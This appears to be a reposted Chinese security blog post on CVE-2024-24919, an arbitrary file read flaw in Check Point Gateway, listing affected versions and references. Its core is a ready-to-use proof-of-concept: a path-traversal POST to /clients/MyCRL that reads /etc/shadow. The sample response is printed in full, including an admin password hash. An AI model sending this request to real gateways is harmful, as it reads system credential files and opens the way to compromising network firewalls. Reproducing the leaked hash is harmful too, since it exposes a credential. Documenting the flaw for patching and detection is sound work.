CVE-2024-24919｜CheckPoint Gateway任意文件读取漏洞（POC）

信安百科

发布于 2024-06-03 15:24:33

4160

发布于 2024-06-03 15:24:33

0x00 前言

Check Point Software Technologies Ltd. (www.checkpoint.com.cn) 是全球领先的政府与企业网络安全供应商。其解决方案对恶意软件、勒索软件和其他类型攻击的捕获率均为业界领先，可保护客户免受第五代网络攻击威胁。

Check Point 提供“Infinity”全面保护多层次安全架构，采用第五代高级威胁防护技术，能够守护企业云端、网络和移动设备中存有的信息。

Check Point 还拥有最为全面和直观的单点控制安全管理系统。Check Point 为 10 万余家大小组织提供安全保护。

0x01 漏洞描述

Check Point Gateway 任意文件读取漏洞，远程攻击者通过构造恶意请求读取服务器上的任意文件，造成敏感信息泄露。

0x02 CVE编号

CVE-2024-24919

0x03 影响版本

R77.20 (EOL)

R77.30 (EOL)

R80.10 (EOL)

R80.20 (EOL)

R80.20.x

R80.20SP (EOL)

R80.30 (EOL)

R80.30SP (EOL)

R80.40 (EOL)

R81

R81.10

R81.10.x

R81.20

0x04 漏洞详情

POC：

POST /clients/MyCRL HTTP/1.1
Host: xxx.xx.xx
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

HTTP/1.0 200 OK
Date: Thu, 30 May 2024 01:38:29 GMT
Server: Check Point SVN foundation
Content-Type: text/html
X-UA-Compatible: IE=EmulateIE7
Connection: close
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Length: 505

admin:$6$rounds=10000$N2We3dls$xVq34E9omWI6CJfTXf.4tO51T8Y1zy2K9MzJ9zv.jOjD9wNxG7TBlQ65j992Ovs.jDo1V9zmPzbct5PiR5aJm0:19872:0:99999:8:::
monitor:*:19872:0:99999:8:::
root:*:19872:0:99999:7:::
nobody:*:19872:0:99999:7:::
postfix:*:19872:0:99999:7:::
rpm:!!:19872:0:99999:7:::
shutdown:*:19872:0:99999:7:::
pcap:!!:19872:0:99999:7:::
halt:*:19872:0:99999:7:::
cp_postgres:*:19872:0:99999:7:::
cpep_user:*:19872:0:99999:7:::
vcsa:!!:19872:0:99999:7:::
_nonlocl:*:19872:0:99999:7:::
sshd:*:19872:0:99999:7:::

0x05 参考链接

https://support.checkpoint.com/results/sk/sk182336

https://github.com/c3rrberu5/CVE-2024-24919

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2024-05-30，如有侵权请联系 cloudcommunity@tencent.com 删除

架构